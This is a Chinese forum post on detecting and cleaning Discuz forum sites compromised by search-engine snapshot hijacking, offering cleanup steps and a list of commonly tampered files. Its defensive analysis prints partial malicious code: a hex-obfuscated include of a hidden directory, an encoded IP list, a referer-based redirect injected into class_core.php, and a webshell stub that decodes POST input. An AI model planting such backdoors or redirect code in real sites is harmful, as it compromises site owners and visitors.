彻底解决discuz网站挂马搜索引擎快照劫持跳转

dly · 发表于 2020-11-10 01:34:33

discuz被挂马discuz百度快照被劫持的解决方法

[DZ挂马]discuz!论坛360快照劫持的处理方法

dz论坛被挂马、快照劫持怎么防范？

关于dz论坛恶意挂赌博广告的排查心得

discuz被挂马_百度快照被劫持的解决办法

网站被挂马_各大搜索引擎快照被劫持的处理方法

Discuz快照劫持检测第一时间发现劫持问题

https://addon.dismall.com/plugins/freeaddon_snapshot.html

网站被挂马搜索引擎被快照劫持跳转，清理被黑内容后，要被黑页面设置为404死链，并通过百度站长平台死链提交工具进行提交。(我们发现有些站点采用了将被黑页面跳转至首页的做法，非常不可取。)

00X0 网站被挂马搜索引擎快照被劫持网页被跳转

00X1 站长们苦恼的问题

00X2 挂马原理分析

第二种：利用字典文件繁殖文章使用include包含引用提交给搜索引擎实施劫持

字典文件是一些关键词文件为文章生成提供资源，生成劫持静态文件放到要引用的文件中，根据SEO知识可知一般目录都不会太深，比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取，平时注意下你的目录下sitemap.txt是否被篡改。

第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些，只需在Include中加上劫持目录即可。

Include引用代码：

@include($_SERVER[‘DOCUMENT_ROOT’].PACK('H*','2F646174612F737973646174612F30'));

复制代码

【处理方法】解密代码：2F646174612F737973646174612F30 解蜜后为：/data/sysdata/0查看此目录找到并清理木马文件。

00X3 DZ论坛挂马常被反复篡改的文件

function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。

一定有很多站长会遇到这个问题，不论怎么修改FTP密码，换服务器...class_core.php文件还是反复被挂马，class_core.php文件反复被挂马什么原因？一会是class_core.php被修改，一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了，会时刻被唤醒使用。

class_core.php常被插入劫持<head>以上部分代码，就是第一种html声明劫持。查看源码看不到任何信息，只能抓取诊断。

为防恶意使用，仅贴出部分代码。

error_reporting(0);
$S9 = explode("|",_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg=='));

复制代码

00X4 网站快照被劫持解决方法

1、进discuz后台找到工具-文件校验，找到最近被修改的php文件与源文件对比下。

2、dz的文件校验不会检查utility文件夹，除了upload里的文件，其他辅助功能文件一般用不到，如上传了请删除，避免被黑客利用。

3、使用后台文件校验看修改文件，UCcenter校验UC文件修改。

4、网站目录使用时间排序方式，查看最近修改的文件有没有可疑。

5、404态设置到位，可很大程度避免收录不存在的趣味劫持页面。

6、看网站目录内有没有被上传的tools目录或tools类型文件。

7、要有一查到底的决心，不然很难找到黑客埋藏的根基。

8、多方位加强防护，让劫持死于摇篮...

00X5 如何发现监测网站被劫持了

站长们要学会从侧面发现快照劫持，不要仅仅在百度一个搜索引擎内site，要在多个搜索引擎内site，这样可以利用搜索引擎侧面检测反应网站快照劫持问题，只要有一个有劫持问题，就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的，因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的，还有就是你网站本身与搜索引擎爬虫友好度有关。

综上述解决快照劫持的大概步骤：校验文件-修改替换原始文件-设定404-举报/更新快照...

加强防范建议：插件不要随便使用，后门很多。

00X6 让你们见识下快照劫持字典文件、站中站脚本目录长什么样
快照劫持页面内容多为趣味、赌具、特服小姐等黄赌毒违法信息或其他办证，公关小姐类灰色外推行业关键词。

00X7 搜索引擎快照劫持扩展阅读

1、什么是搜索引擎快照劫持？

快照劫持：利用网站程序漏洞或爆破ftp，挂马篡改网页信息并主动post提交给搜索引擎，让其抓取收录，快照的内容多为趣味等推广内容。

2、搜索引擎快照劫持技术是什么？

搜索引擎劫持主要分快照劫持与跳转劫持，就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持，有的再生成新链接或上传大量静态页面挂黄赌毒趣味相关行业推广词；跳转劫持是使用跳转脚本让访问链接跳转到其他指定趣味站页面，主要是提高网站受众群体量与增加网站曝光度。

3、最新快照劫持及网页篡改网站入侵挂马问题

class_core.php文件插入跳转代码

error_reporting(E_ALL);
@error_reporting(1);
@$ref = strtolower($_SERVER['HTTP_REFERER']);
@$jump_ref = explode("|","haoso.|so.|haosou.|google.|soso.");
foreach($jump_ref as $r){
$r = trim($r);
if(stristr($ref,$r)){
if($_GET['tid']>50000){
header('Location......

复制代码

<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
$cc.=urldecode("%".substr($GuTou,$i,2));
}
?>

复制代码

查被挂彩的语法，常用特征词【】【官网入口】...
使用语法关键词 site：语法